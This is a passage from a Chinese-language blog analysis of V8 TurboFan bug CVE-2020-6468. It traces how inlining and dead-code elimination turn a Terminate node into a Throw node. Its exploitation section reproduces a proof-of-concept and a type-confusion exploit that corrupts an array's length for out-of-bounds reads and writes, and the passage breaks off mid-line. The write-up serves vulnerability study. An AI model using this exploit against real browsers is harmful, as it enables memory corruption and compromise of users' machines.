class="title">BytecodeGraphBuilder::VisitCallUndefinedReceiver0</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    <span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildCall</span><span class="params">(ConvertReceiverMode receiver_mode, std::initializer_list&lt;Node*&gt; args, <span class="type">int</span> slot_id)</span></span></span><br><span class="line"><span class="function">        <span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildCall</span><span class="params">(ConvertReceiverMode receiver_mode, Node* <span class="type">const</span>* args, <span class="type">size_t</span> arg_count, <span class="type">int</span> slot_id)</span></span></span><br></pre></td></tr></table></figure><p>对应的 最底层<code>BuidCall</code> 函数源码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildCall</span><span class="params">(ConvertReceiverMode receiver_mode,</span></span></span><br><span class="line"><span class="params"><span class="function">                                     Node* <span class="type">const</span>* args, <span class="type">size_t</span> arg_count,</span></span></span><br><span class="line"><span class="params"><span class="function">                                     <span class="type">int</span> slot_id)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ..</span></span><br><span class="line">  <span class="comment">// 生成 JSCall 的Operator</span></span><br><span class="line">  <span class="type">const</span> Operator* op =</span><br><span class="line">      <span class="built_in">javascript</span>()-&gt;<span class="built_in">Call</span>(arg_count, frequency, feedback, receiver_mode,</span><br><span class="line">                         speculation_mode, CallFeedbackRelation::kRelated);</span><br><span class="line">  <span class="comment">// 关键！执行 JSTypeHintLowering操作</span></span><br><span class="line">  JSTypeHintLowering::LoweringResult lowering = <span class="built_in">TryBuildSimplifiedCall</span>(</span><br><span class="line">      op, args, <span class="built_in">static_cast</span>&lt;<span class="type">int</span>&gt;(arg_count), feedback.slot);</span><br><span class="line">  <span class="comment">// 如果 JSTypeHintLowering 操作中存在问题，则不插入 JSCall 结点</span></span><br><span class="line">  <span class="keyword">if</span> (lowering.<span class="built_in">IsExit</span>()) <span class="keyword">return</span>;</span><br><span class="line">  <span class="comment">// 执行到这里时，基本上 JSCall 结点将会插入至图中</span></span><br><span class="line">  Node* node = <span class="literal">nullptr</span>;</span><br><span class="line">  <span class="keyword">if</span> (lowering.<span class="built_in">IsSideEffectFree</span>()) &#123;</span><br><span class="line">    node = lowering.<span class="built_in">value</span>();</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="built_in">DCHECK</span>(!lowering.<span class="built_in">Changed</span>());</span><br><span class="line">    node = <span class="built_in">ProcessCallArguments</span>(op, args, <span class="built_in">static_cast</span>&lt;<span class="type">int</span>&gt;(arg_count));</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">environment</span>()-&gt;<span class="built_in">BindAccumulator</span>(node, Environment::kAttachFrameState);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>我们发现，只有当 TryBuildSimplifiedCall 函数返回的结果不满足 IsExit 条件时， JSCall 结点才会被插入至图中。而进一步跟踪，发现只有当函数的Feedback充足时，才<strong>不会满足</strong> IsExit 条件，并将插入 JSCall 结点。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Node* <span class="title">JSTypeHintLowering::TryBuildSoftDeopt</span><span class="params">(FeedbackSlot slot, Node* effect,</span></span></span><br><span class="line"><span class="params"><span class="function">                                            Node* control,</span></span></span><br><span class="line"><span class="params"><span class="function">                                            DeoptimizeReason reason)</span> <span class="type">const</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (!(<span class="built_in">flags</span>() &amp; kBailoutOnUninitialized)) <span class="keyword">return</span> <span class="literal">nullptr</span>;</span><br><span class="line"></span><br><span class="line">  <span class="function">FeedbackSource <span class="title">source</span><span class="params">(feedback_vector(), slot)</span></span>;</span><br><span class="line">  <span class="comment">// 如果Feedback较少，则继续执行，否则返回 nullptr以 **拒绝** 生成 LoweringResult::Exit</span></span><br><span class="line">  <span class="keyword">if</span> (!<span class="built_in">broker</span>()-&gt;<span class="built_in">FeedbackIsInsufficient</span>(source)) <span class="keyword">return</span> <span class="literal">nullptr</span>;</span><br><span class="line">  <span class="comment">// 以下是对 Feedback 较少的情况所生成的结点，注意这是一种我们不愿意看到的情况</span></span><br><span class="line">  Node* deoptimize = <span class="built_in">jsgraph</span>()-&gt;<span class="built_in">graph</span>()-&gt;<span class="built_in">NewNode</span>(</span><br><span class="line">      <span class="built_in">jsgraph</span>()-&gt;<span class="built_in">common</span>()-&gt;<span class="built_in">Deoptimize</span>(DeoptimizeKind::kSoft, reason,</span><br><span class="line">                                      <span class="built_in">FeedbackSource</span>()),</span><br><span class="line">      <span class="built_in">jsgraph</span>()-&gt;<span class="built_in">Dead</span>(), effect, control);</span><br><span class="line">  Node* frame_state =</span><br><span class="line">      NodeProperties::<span class="built_in">FindFrameStateBefore</span>(deoptimize, <span class="built_in">jsgraph</span>()-&gt;<span class="built_in">Dead</span>());</span><br><span class="line">  deoptimize-&gt;<span class="built_in">ReplaceInput</span>(<span class="number">0</span>, frame_state);</span><br><span class="line">  <span class="keyword">return</span> deoptimize;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>综上，当函数调用次数较多时，JSCall 才会正常插入至图中，并为接下来内联目标函数提供了有力的基础。</p><p><img src="/2021/02/CVE-2020-6468/jscall.png" alt="img">)_</p></li><li><p><code>JSInliningHeuristic::Finalize</code>函数要做的操作很简单，取出 candidates_ 集合中的结点并进行内联操作：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JSInliningHeuristic::Finalize</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="function">DisallowHeapAccessIf <span class="title">no_heap_acess</span><span class="params">(broker()-&gt;is_concurrent_inlining())</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (candidates_.<span class="built_in">empty</span>()) <span class="keyword">return</span>;  <span class="comment">// Nothing to do without candidates.</span></span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// We inline at most one candidate in every iteration of the fixpoint.</span></span><br><span class="line">  <span class="comment">// This is to ensure that we don&#x27;t consume the full inlining budget</span></span><br><span class="line">  <span class="comment">// on things that aren&#x27;t called very often.</span></span><br><span class="line">  <span class="comment">// TODO(bmeurer): Use std::priority_queue instead of std::set here.</span></span><br><span class="line">  <span class="keyword">while</span> (!candidates_.<span class="built_in">empty</span>()) &#123;</span><br><span class="line">    <span class="keyword">auto</span> i = candidates_.<span class="built_in">begin</span>();</span><br><span class="line">    Candidate candidate = *i;</span><br><span class="line">    candidates_.<span class="built_in">erase</span>(i);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 判断当前 inline 的函数是否是 dead code</span></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// 对目标函数的大小以及已经 inline 的大小进行限制</span></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">      万事无误，开始执行内联操作...</span></span><br><span class="line"><span class="comment">      InlineCandidate 函数将会把 JSCall/JSConstruct 结点，用另一个函数的子图来扩展。</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    Reduction <span class="type">const</span> reduction = <span class="built_in">InlineCandidate</span>(candidate, <span class="literal">false</span>);</span><br><span class="line">    <span class="keyword">if</span> (reduction.<span class="built_in">Changed</span>()) <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><code>JSInliningHeuristic::Finalize</code>函数中所调用的<code>InlineCandidate</code>函数，将会<strong>用另一个函数的子图来扩展当前 JSCall/JSConstruct结点</strong>。</p><p>这整个<strong>将某个函数内联进图</strong>的操作，关键在于：</p><ul><li>另一个函数的图是直接在<code>InlineCandidate</code>函数中，通过 BytecodeGraphBuilder 建立，因此新图中的所有结点<strong>尚未经过任何的优化</strong>。</li><li>同时，由于此时已经位于 GraphReducer 中的 Finalize 阶段，因此新加入至图中的结点将不会经过 DeadCodeElimination 的优化操作（注意<strong>这里指的 DeadCodeElimination 位于 inliningPhase</strong> ）。</li></ul><p>所以，另一个函数中的 Loop &amp; Terminate 结点均可保留，即通过 inliningPhase 后的图，仍然可以保留 Loop &amp; Terminate 结点。</p><p><img src="/2021/02/CVE-2020-6468/loop_terminate.png" alt="img"></p></li></ul><h4 id="f-Schedule-AddThrow函数">f. Schedule::AddThrow函数</h4><ul><li><p>JIT 中 EffectControlLinearizationPhase 主要完成以下工作：</p><ul><li>建立一个 <code>Scheduler</code></li><li>使用 <code>Scheduler</code> 重建控制流（control chain）和效果流（effect chain）</li><li>在重建时，优化部分操作并将其连接至 控制流/效果流中。</li></ul><p>也就是说，<strong>重建控制流和效果流的这部分操作位于 <code>Scheduler</code> 类中</strong>。</p></li><li><p>而我们可以通过以下调用链，调用至 AddThrow 函数</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">PipelineImpl::OptimizeGraph</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">  <span class="type">void</span> <span class="title">EffectControlLinearizationPhase::Run</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">    Schedule* <span class="title">Scheduler::ComputeSchedule</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">      <span class="type">void</span> <span class="title">Scheduler::BuildCFG</span><span class="params">()</span></span></span><br><span class="line"><span class="function">        <span class="type">void</span> <span class="title">CFGBuilder::Run</span><span class="params">()</span></span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">CFGBuilder::ConnectBlocks</span><span class="params">(Node* node)</span></span></span><br><span class="line"><span class="function">            <span class="type">void</span> <span class="title">CFGBuilder::ConnectThrow</span><span class="params">(Node* thr)</span></span></span><br><span class="line"><span class="function">              <span class="type">void</span> <span class="title">Schedule::AddThrow</span><span class="params">(...)</span></span></span><br></pre></td></tr></table></figure><p>Scheduler 建立 CFG 时将会遍历控制结点（control node），如果遍历至 <code>IrOpcode::kThrow</code> 结点，则将会进行以下操作：</p><ol><li><p>获取 throw 结点的控制结点 throw_control</p></li><li><p>获取该控制结点的前驱(Predecessor)基础块 throw_block</p></li><li><p>设置 throw_block 的<strong>末尾控制流结点类型</strong>为 <code>BasicBlock::kThrow</code></p><blockquote><p>即设置<strong>末尾可终止该基本块的控制流结点</strong>的类型为 <code>BasicBlock::kThrow</code></p></blockquote></li><li><p>为 throw_block 基本块设置其<strong>控制流输入结点</strong>（control input）为当前 kThrow 结点。</p><blockquote><p>该 control input 应该是基本块的最后一个结点。</p></blockquote></li></ol><blockquote><p>综上，若建立CFG时遍历到了 throw 控制流结点，则将</p><ol><li>获取 throw 控制流结点的前驱基本块</li><li>设置该基本块末尾的控制流结点类型以及控制流输入结点</li></ol><p>需要注意的是，基础块的控制流指向是<strong>从后往前</strong>的，因此 throw 控制流结点才会去处理前驱基础块末尾结点 （见第三个参考链接）</p></blockquote></li></ul><h3 id="2-关键点">2. 关键点</h3><ul><li><p><code>DeadCodeElimination::ReduceDeoptimizeOrReturnOrTerminateOrTailCall</code>将会对 Terminate 结点进行处理，如果 Terminate 结点存在 Dead Input，则将其<strong>替换为 Throw 结点</strong>。<strong>由于 Terminate 结点并非实际控制流结点的一部分</strong>，因此这种替换成 Throw 结点的方式将会带来一些问题。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">DeadCodeElimination::ReduceDeoptimizeOrReturnOrTerminateOrTailCall</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK</span>(node-&gt;<span class="built_in">opcode</span>() == IrOpcode::kDeoptimize ||</span><br><span class="line">         node-&gt;<span class="built_in">opcode</span>() == IrOpcode::kReturn ||</span><br><span class="line">         node-&gt;<span class="built_in">opcode</span>() == IrOpcode::kTerminate ||</span><br><span class="line">         node-&gt;<span class="built_in">opcode</span>() == IrOpcode::kTailCall);</span><br><span class="line">  Reduction reduction = <span class="built_in">PropagateDeadControl</span>(node);</span><br><span class="line">  <span class="keyword">if</span> (reduction.<span class="built_in">Changed</span>()) <span class="keyword">return</span> reduction;</span><br><span class="line">  <span class="comment">// 如果存在 DeadInput, 则将 Terminate 结点优化成 Throw 结点。</span></span><br><span class="line">  <span class="comment">// 因为存在DeadInput，所以 Terminate 结点将不会被执行到，一旦执行到肯定是出错了，即Throw</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">FindDeadInput</span>(node) != <span class="literal">nullptr</span>) &#123;</span><br><span class="line">    Node* effect = NodeProperties::<span class="built_in">GetEffectInput</span>(node, <span class="number">0</span>);</span><br><span class="line">    Node* control = NodeProperties::<span class="built_in">GetControlInput</span>(node, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (effect-&gt;<span class="built_in">opcode</span>() != IrOpcode::kUnreachable) &#123;</span><br><span class="line">      effect = <span class="built_in">graph</span>()-&gt;<span class="built_in">NewNode</span>(<span class="built_in">common</span>()-&gt;<span class="built_in">Unreachable</span>(), effect, control);</span><br><span class="line">      NodeProperties::<span class="built_in">SetType</span>(effect, Type::<span class="built_in">None</span>());</span><br><span class="line">    &#125;</span><br><span class="line">    node-&gt;<span class="built_in">TrimInputCount</span>(<span class="number">2</span>);</span><br><span class="line">    node-&gt;<span class="built_in">ReplaceInput</span>(<span class="number">0</span>, effect);</span><br><span class="line">    node-&gt;<span class="built_in">ReplaceInput</span>(<span class="number">1</span>, control);</span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">common</span>()-&gt;<span class="built_in">Throw</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><strong>“Terminate 结点并非实际控制流结点”</strong>。这句话看上去有点难以理解，但实际上我们可以沿以下调用链，在<code>InstructionSelector::VisitNode</code>函数中找到答案：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">PipelineImpl::OptimizeGraph</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">  <span class="type">bool</span> <span class="title">PipelineImpl::SelectInstructions</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">    <span class="type">void</span> <span class="title">InstructionSelectionPhase::Run</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">      <span class="type">bool</span> <span class="title">InstructionSelector::SelectInstructions</span><span class="params">()</span></span></span><br><span class="line"><span class="function">        <span class="type">void</span> <span class="title">InstructionSelector::VisitBlock</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">InstructionSelector::VisitNode</span><span class="params">(Node* node)</span></span></span><br></pre></td></tr></table></figure><p>在<code>VisitNode</code>函数中，IrOpcode中的<code>kStart</code>、<code>kLoop</code>，以及<code>kEffectPhi</code>、<code>kTerminate</code>等，都没有其对应的具体操作，即没有调用对应的 <code>VisitXXX</code> 函数。实际上，这些空操作的结点，在图中只是<strong>用于标识某些状态信息</strong>。以<code>kLoop</code>为例，该结点标识了一个循环的范围，但并不会实际翻译成对应的机器码。</p><p>以下是<code>VisitNode</code>函数的源码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">InstructionSelector::VisitNode</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  tick_counter_-&gt;<span class="built_in">DoTick</span>();</span><br><span class="line">  <span class="built_in">DCHECK_NOT_NULL</span>(<span class="built_in">schedule</span>()-&gt;<span class="built_in">block</span>(node));  <span class="comment">// should only use scheduled nodes.</span></span><br><span class="line">  <span class="keyword">switch</span> (node-&gt;<span class="built_in">opcode</span>()) &#123;</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kStart:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kLoop:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kEnd:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kBranch:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kIfTrue:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kIfFalse:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kIfSuccess:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kSwitch:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kIfValue:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kIfDefault:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kEffectPhi:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kMerge:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kTerminate:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kBeginRegion:</span><br><span class="line">      <span class="comment">// No code needed for these graph artifacts.</span></span><br><span class="line">      <span class="keyword">return</span>;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kFloat32Constant:</span><br><span class="line">      <span class="keyword">return</span> <span class="built_in">MarkAsFloat32</span>(node), <span class="built_in">VisitConstant</span>(node);</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>以下是漏洞团队给出的 mini POC，该POC 可以触发 ReduceDeoptimizeOrReturnOrTerminateOrTailCall 函数，将 <code>Terminate</code> 结点优化成 <code>Throw</code>结点。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">var obj = &#123;&#125;;</span><br><span class="line"><span class="function">function <span class="title">f</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    var var13 = <span class="keyword">new</span> <span class="built_in">Int8Array</span>(<span class="number">0</span>);</span><br><span class="line">    var13[<span class="number">0</span>] = obj;</span><br><span class="line">    <span class="function">async function <span class="title">var5</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="type">const</span> var9 = &#123;&#125;;</span><br><span class="line">        <span class="keyword">while</span> (<span class="number">1</span>) &#123;</span><br><span class="line">            <span class="keyword">if</span> (abc1 | abc2)</span><br><span class="line">                <span class="keyword">while</span> (var9) &#123;</span><br><span class="line">                    await <span class="number">1</span>;</span><br><span class="line">                    <span class="built_in">print</span>(abc3);</span><br><span class="line">                &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">var5</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">f</span>());</span><br><span class="line">% <span class="built_in">PrepareFunctionForOptimization</span>(f);</span><br><span class="line"><span class="keyword">for</span> (var i = <span class="number">0</span>; i &lt; <span class="number">22</span>; i++)</span><br><span class="line">    <span class="built_in">f</span>();</span><br><span class="line">% <span class="built_in">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="built_in">f</span>();</span><br></pre></td></tr></table></figure><p>输出如下：</p><blockquote><p>注：图中的 <code>[INFO]</code> <code>[ERROR]</code> 等输出，均为手动打 patch 的输出。</p></blockquote><p><img src="/2021/02/CVE-2020-6468/terminate2throwInfo.png" alt="img"></p></li></ul><blockquote><p>这个 Poc 构造难度相当大，归根到底是因为 JIT 的优化机制复杂多变，常常出现上一个优化的结果跨过好几个Phase后，被某个位于角落的优化代码给处理了。</p><p>这个 Poc 仍然需要再细细研究一下。</p></blockquote><h2 id="四、漏洞利用">四、漏洞利用</h2><ul><li><p>当 Terminate 结点被替换成 Throw 结点后，在 turboFan EffectControlLinearizationPhase 中，部分指令将被错误地调度。如果我们可以在 <strong>checkmap 结点前向目标对象的特定位置写入 -1</strong>，那么就可以成功达到 type confusion 的目的。即，在目标函数<strong>认出</strong>当前对象非预期对象之前（check map），将 -1 写入对应位置。</p></li><li><p>以下是 issue中给出的越界读取 exp</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">classA</span> &#123;</span><br><span class="line">    <span class="built_in">constructor</span>() &#123;</span><br><span class="line">        <span class="keyword">this</span>.val = <span class="number">0x4242</span>;</span><br><span class="line">        <span class="keyword">this</span>.x = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">this</span>.a = [<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">classB</span> &#123;</span><br><span class="line">    <span class="built_in">constructor</span>() &#123;</span><br><span class="line">        <span class="keyword">this</span>.val = <span class="number">0x4141</span>;</span><br><span class="line">        <span class="keyword">this</span>.x = <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">this</span>.s = <span class="string">&quot;dsa&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">var A = <span class="keyword">new</span> <span class="built_in">classA</span>();</span><br><span class="line">var B = <span class="keyword">new</span> <span class="built_in">classB</span>()</span><br><span class="line"></span><br><span class="line">function <span class="built_in">f</span>(arg1, arg2) &#123;</span><br><span class="line">    <span class="keyword">if</span> (arg2 == <span class="number">41</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">5</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    var int8arr = <span class="keyword">new</span> <span class="built_in">Int8Array</span>(<span class="number">10</span>);</span><br><span class="line">    var z = arg<span class="number">1.</span>x;</span><br><span class="line">    <span class="comment">// new arr length</span></span><br><span class="line">    arg<span class="number">1.</span>val = <span class="number">-1</span>;</span><br><span class="line">    int8arr[<span class="number">1500000000</span>] = <span class="number">22</span>;</span><br><span class="line">    <span class="function">async function <span class="title">f2</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="type">const</span> nothing = &#123;&#125;;</span><br><span class="line">        <span class="keyword">while</span> (<span class="number">1</span>) &#123;</span><br><span class="line">            <span class="comment">//print(&quot;in loop&quot;);</span></span><br><span class="line">            <span class="keyword">if</span> (abc1 | abc2) &#123;</span><br><span class="line">                <span class="keyword">while</span> (nothing) &#123;</span><br><span class="line">                    await <span class="number">1</span>;</span><br><span class="line">                    <span class="built_in">print</span>(abc3);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">f2</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">var arr = <span class="keyword">new</span> <span class="built_in">Array</span>(<span class="number">10</span>);</span><br><span class="line">arr[<span class="number">0</span>] = <span class="number">1.1</span>;</span><br><span class="line"></span><br><span class="line">var i;</span><br><span class="line"><span class="comment">// this may optimize and deopt, that&#x27;s fine</span></span><br><span class="line"><span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; <span class="number">20000</span>; i++) &#123;</span><br><span class="line">    <span class="built_in">f</span>(A, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">f</span>(B, <span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// this will optimize it and it won&#x27;t deopt</span></span><br><span class="line"><span class="comment">// this loop needs to be less than the previous one</span></span><br><span class="line"><span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; <span class="number">10000</span>; i++) &#123;</span><br><span class="line">    <span class="built_in">f</span>(A, <span class="number">41</span>);</span><br><span class="line">    <span class="built_in">f</span>(B, <span class="number">41</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">console.<span class="built_in">log</span>(<span class="string">&quot;change the arr length&quot;</span>);</span><br><span class="line"><span class="built_in">f</span>(arr, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;LENGTH: &quot;</span> + arr.length.<span class="built_in">toString</span>());</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;value at index 12: &quot;</span> + arr[<span class="number">12</span>].<span class="built_in">toString</span>());</span><br><span class="line"></span><br><span class="line"><span class="comment">// crash</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;crash writing to offset 0x41414141&quot;</span>);</span><br><span class="line">arr[<span class="number">0x41414141</span>] = <span 